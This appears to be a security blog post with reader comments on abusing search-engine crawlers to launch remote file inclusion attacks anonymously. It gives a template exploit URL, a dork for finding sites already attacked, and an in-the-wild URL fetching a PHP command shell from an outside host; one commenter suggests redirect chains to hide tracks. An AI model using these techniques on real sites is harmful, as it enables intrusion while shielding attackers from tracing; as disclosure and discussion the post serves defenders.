Anonymizing RFI Attacks Through Google

google can be utilized to hack into websites – actively exploiting them (not information gathering by the use of “google hacking”, although that is how most of the sites vulnerable to rfi attacks are found).

by placing a url on any web page, google will find it, visit it and then index it. with this mechanism, it is possible to anonymize attacks on third party web sites through google by the use of its crawler.

poc -
a malicious web page is constructed by an attacker, containing a url built like so:
1. third party site uri to attack.
2. file inclusion exploit.
3. second uri containing a malicious php shell.

example url:
http://victim-site/rfi-exploit?http://uri-with-malicious-code.php

google will harvest this url, visit the site using its crawler and index it.
meaning accessing the target site with the url it was provided and exploiting it unwittingly for whoever planted it. it’s a feature, not a bug.

this is currently exploited in the wild. for example, try searching google for:
inurl:cmd.gif

and note, as an example:
www.toomuchcookies.net/index.php?s=http:/%20/xpl.netmisphere2.com/cmd.gif?cmd
which is no longer vulnerable. the %20 seems out of place, but this is how it is shown in the search.

why use a botnet when one can abuse the google crawler, which is allowed on most web sites?

notes:
1. this attack was verified on google, but there is no reason why it should not work with other search engines, web crawlers and web spiders.
2. file inclusions seem to tie in well with this attack anonymizer, but there is no reason why others attack types can’t be used in a similar fashion.
3. the feature might also be used to anonymize communication, as a covert channel.

noam rathaus.
(with thanks to Sun Shine and lev toger)

Share
  • http://www.nastynerds.com MERLiiN

    This isn’t exactly new, but it was nice to see some more concrete examples.
    To make it somewhat harder to trace a large list of generated urls could be made to go to a 404 page which in turn issues a 301 redirect to vulnerable urls from a database populated by previous google searches. Google follows the 301 and if possible (think php’s ob_start) receives another 301 from the command shell to redirect it to a known site.
    Google will have hacked the website and not indexed it. All you need is a script to handle the 404 requests and some vulnerable urls for google to crawl. Heck, why not make Google submit the defaced page to Zone-H if you are carefree.

  • Pingback: Stefans Home

  • http://stefan.ploing.de/node/206 Stefan

    What about the referer header? Google omits it, but how do different search spiders behave? If a website visitor inadverently clicks the prepared link, a referer entry will be stored in the victim’s log – which might lead back to the attacker.
    Yes, some free web space can further hide the attacker’s trace – but this might be the point when using an anonymous net access (like an internet cafe) in the first place would be easier.
    Nevertheless an interesting idea :)

  • LoP

    This concept was already described in Phrack 57 [1]. Which was published back in 2001.

    [1] http://www.phrack.org/archives/57/p57-0×13

  • Stefan Esser
  • blerg

    it’s nice to see this exploited in the wild. maybe now it will actually get fixed.

  • Pingback: Rory.Blog

  • http://ryanlrussell.blogspot.com/ Ryan Russell

    Congrats on the Slashdot link. I had observed Google being used for simpler attacks a number of years ago. Some of them were mentioned in a Register story.

  • Breakable

    Don’t think likely for this method to be exploited widely, as its complicated and inconvenient – you must be sure your exploit works correctly, and you need to wait for the googlebot to follow your link (which takes some time).

    More likely attackers will stick to the botnets for now.

  • Frank Knobbe

    As mentioned this has been around for a while (and used in finding vulnerable websites and open-proxies). However, everyone seems to focus on Google. We’ve seen similar attacks perpetrated by the MSN search engine as well. I’m sure other search engines could also be coaxed to perform anonymous reconnaissance for an attacker.

    This is a pain for self-defending networks since you can’t block the original attacker. Blocking Google is counter-intuitive but may eventually become a necessity if these problems aren’t addressed.

  • Pingback: Anonymous

  • http://Notabigdeal. Bob

    This isn’t something that is easily fixed. Then again, it’s really not a big deal. It is just one of a hundred ways an attacker can hide their tracks. It’s like an anonymous proxy, such as tor, but slower.

    Remember kids. You are usually only somewhat anonymous on the internet. But an attacker that is careful is nearly impossible to find.

  • Rob

    I don’t think this is a real threat. Anyone using this exploit could have the original site traced using the google search for sites which linked to the script executed. From here the original user could also be traced.
    I think insecure redirection scripts are a much greater threat. In a single url, you could call multiple sites’ redirection scripts which eventually lead to a script which delivers the payload. This would be instant and hard to trace back as only the previous jump would be detectable. By redirection script, I mean ones which include the content rather than true redirection. Another option would be to list the link in wikipedia or digg or similar high traffic sites. These seem to get indexed more frequently and if you are lucky, will also get mirrored and visitor clicks, also calling the script. Just give the text an attractive name!

  • Anonymous

    You have a lack of understanding of what you’re seeing. You’ve stubled across sites that are being used in PHP include() attacks. Great big deal. The other point you’re trying to get at is that google can be used to auto attack websites (the example you site doesn’t work exactly as you think it does), this is nothing new, lcamtuf came up with this at least five years ago:
    http://www.phrack.org/archives/57/p57-0×13

    Congrats on being late to the party, not bringing any intelectual gifts, and still making slashdot.

  • Pingback: iBlog - Ilia Alshanetsky

  • Newbie

    Does Google and other crawler index page with more than one parameters?

    I remeber that google index page with only one parameter in query string.

  • johnny h4x0r

    what a lame article.is this article worth a reading?.why do u write such stuff.do u even know what is the full form of poc?what u described is a simple google crawling technique.as for the anonymous thing ,is google a browser? lamer u cant chk the site whether its vuln without trying it in ur browser or something.if u r happy to see ur “poc” sites in google results and think its vuln and u think u have hacked a site “anonymously” then its a different story.

  • http://www.none.com Haider

    what a lame story u have published?? do u have any idea about what u were goin to describe and what u have described? how come it is anoymouse? can u explain me?? were u tryin to explain about how irc bots can search through vuln host by using google search and exploit it automatically??? man through browser google can search Host but doesnt automatically exploit ‘em lol go and read more abt RFI attacks and yess u lame kidd how come its POC ??? heheh have u released any Kernel Exploit??? -;)
    bye lamer

  • Mr utts

    Dear lord,

    Haider I hope to god English is not your primary language you speak or write in.

    Did you even freaking read the post from the guys or did you just start typing rambling shit?

  • http://www.toomuchcookies.net/ Omar

    Just apropos: My site (toomuchcookies) was never vulnerable (as far as i know). The search engines produced something, because some idiot tried to search for that string (cmd.gif) on my site and it got recorded under “SE-Queries”..

  • http://www.tercumeservisi.com tercüme

    SecuriTeam Blogs » Anonymizing RFI Attacks Through Google Interesting post at the Securiteam blog, giving some more details on the idea of using google to hack for you by causing it to spider links which contain exploits.

  • http://www.dost-chat.com sohbet

    Does Google and other crawler index page with more than one parameters?

    I remeber that google index page with only one parameter in query string.